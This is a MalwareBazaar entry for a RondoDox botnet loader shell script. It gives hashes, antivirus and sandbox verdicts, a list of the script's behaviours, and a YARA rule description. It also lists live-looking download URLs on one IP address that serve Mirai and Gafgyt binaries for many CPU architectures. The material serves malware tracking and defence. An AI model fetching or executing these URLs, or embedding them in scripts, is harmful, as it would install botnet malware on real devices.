MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 91c0646895d8398081351d690f1c5af75d242c13f22a80dc82fc9ae4798a4576. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


RondoDox


Vendor detections: 6


Intelligence 6 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 91c0646895d8398081351d690f1c5af75d242c13f22a80dc82fc9ae4798a4576
SHA3-384 hash: 14e5367bd8ee3b68902793de785356787f28cbc96a44e0daa306136dcfef71df6b173a1a7dceb43be0d9207748902966
SHA1 hash: 8cff1272d3e18ce658596dc9f6be684860e458cd
MD5 hash: c156b1348b56c5ce6205cd735266ad37
humanhash: oven-low-seven-saturn
File name:rondo.aqu.sh
Download: download sample
Signature RondoDox
Create hunting rule
File size:9'432 bytes
First seen:2025-12-26 00:27:44 UTC
Last seen:2025-12-26 15:17:49 UTC
File type: sh
MIME type:text/x-shellscript
ssdeep 96:Ax0iRoLngD29clc5sFE6KCrdYnuQuMN7EJI+KybNwjaMyybNsDPi0MD6sO01Dkln:g0goLngucCJU
TLSH T19112D9A839D432FAA8AD6502D393A27C5DC482D17073CAB5D8F844F66A794C8B05FF71
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:RondoDox sh
URLMalware sample (SHA256 hash)SignatureTags
http://41.231.37.153/rondo.loln/an/aua-wget
http://41.231.37.153/rondo.x86_64092a91a8ec8d2c719cb214d41f5b4429fa31dbcd29fc698f05d22c97c0f40b0c Gafgytgafgyt RondoDox ua-wget
http://41.231.37.153/rondo.i686d52f802a52b7dab9e7621e9c51ab12e44024d0de98ee3c87bbb99ce95dedfbf7 Miraimirai ua-wget
http://41.231.37.153/rondo.i5864312bc23da1046b884de3be3326540afe18b423df3b0f13958219f87fceb81d6 Miraimirai ua-wget
http://41.231.37.153/rondo.i486n/an/amirai ua-wget
http://41.231.37.153/rondo.armv6l9772fc6fae400b0ecf6f47f0baea886401c78db2a89ca9fcd84285a77a8c0b18 Miraimirai ua-wget
http://41.231.37.153/rondo.armv5l57f1b04fa15dd398fafda2ddf97886ca274a80c2acc40ac2b4aca657c2de296c Miraimirai RondoDox ua-wget
http://41.231.37.153/rondo.armv4l46e478702c3b475514dc7c61e494fed88796f8762c8d81d8893fc9e53c35fe38 Miraimirai ua-wget
http://41.231.37.153/rondo.armv7lc53c1790a9133621d8e6e4611e981d26a3b338ff2d4c2921960fedba9d96354e RondoDoxmirai RondoDox ua-wget
http://41.231.37.153/rondo.powerpca3b5397d5249497bd52e5a46635f135cd668e56ade104be100e6add9291fcb61 Miraimirai ua-wget
http://41.231.37.153/rondo.powerpc-440fpn/an/amirai RondoDox ua-wget
http://41.231.37.153/rondo.mips1150d27a2f9e1bc4bd7e100fe6436a1318357963b6b1b25b381816e7f13e3904 Gafgytgafgyt ua-wget
http://41.231.37.153/rondo.mipsela9d3f2d841cc1f2e1cffc45d498c7d082b370079702bec3a65bc294a33a9910a Gafgytgafgyt ua-wget
http://41.231.37.153/rondo.arc7001a1f3f0486a05ac160306cc1a7da24b9e6964b1298e915e363bba4612751a969 Miraimirai ua-wget
http://41.231.37.153/rondo.sh48427a0c43abda82169b6ac65d182d767c85c23b4bd56ed27d1e04461123ad3e2 Miraimirai ua-wget
http://41.231.37.153/rondo.sparc911ac65df00b90b505fa62e5949e249014ffefa3ab1d51d5a02a24a099bdf0d5 Miraimirai ua-wget
http://41.231.37.153/rondo.m68k0e571eaa740bcbb03d1d7d93df6630cbcedaedd0c3bdeabdf4df6f54fdacc248 Miraimirai ua-wget
http://41.231.37.153/rondo.armebn/an/aRondoDox ua-wget
http://41.231.37.153/rondo.armebhfn/an/aua-wget

Intelligence

File Origin
# of uploads :
2
# of downloads :
52
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Detection(s):
URLhaus.3736087.UNOFFICIAL
Create hunting rule

URLhaus.3736092.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
busybox masquerade
Link:
https://www.filescan.io/uploads/694dd69c3f8fdbf8e952366c/reports/80ba3738-ab10-44ed-ba68-9e1dfe37231e/overview
Verdict:
Clean
File Type:
unix shell
Link:
https://opentip.kaspersky.com/91c0646895d8398081351d690f1c5af75d242c13f22a80dc82fc9ae4798a4576/results?tab=lookup
Score:
99%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/91c0646895d8398081351d690f1c5af75d242c13f22a80dc82fc9ae4798a4576
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/91c0646895d8398081351d690f1c5af75d242c13f22a80dc82fc9ae4798a4576/
Verdict:
Malicious
Threat:
Family.MIRAI
Link:
https://tip.neiki.dev/file/91c0646895d8398081351d690f1c5af75d242c13f22a80dc82fc9ae4798a4576
Threat name:
Script-Shell.Downloader.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2025-12-26 00:28:13 UTC
File Type:
Text (Shell)
AV detection:
2 of 36 (5.56%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=shagi2ev3a4ybajvdvuq6hc265osilat6ivibxec7snoi6mkiv3a._file
Result
Malware family:
n/a
Score:
  7/10
Tags:
defense_evasion discovery linux persistence privilege_escalation
Link:
https://tria.ge/reports/251226-asemqawkgl/
Behaviour
Enumerates kernel/hardware configuration
Reads runtime system information
Writes file to shm directory
Writes file to tmp directory
Reads CPU attributes
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Deletes log files
Disables AppArmor
Disables SELinux
Enumerates running processes
Write file to user bin folder
Writes file to system bin folder
File and Directory Permissions Modification
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Suspicious File
Score:
0.31
Link:
https://yomi.yoroi.company/submissions/91c0646895d8398081351d690f1c5af75d242c13f22a80dc82fc9ae4798a4576

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Create hunting rule
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

RondoDox

sh 91c0646895d8398081351d690f1c5af75d242c13f22a80dc82fc9ae4798a4576

(this sample)

Gafgyt

elf 092a91a8ec8d2c719cb214d41f5b4429fa31dbcd29fc698f05d22c97c0f40b0c

  
URLhaus
https://urlhaus.abuse.ch/url/3736083/
  
Delivery method
Distributed via web download
  
Dropping
MD5 542833382147a9aaab56ec86e0952317
  
Dropping
SHA256 092a91a8ec8d2c719cb214d41f5b4429fa31dbcd29fc698f05d22c97c0f40b0c

Comments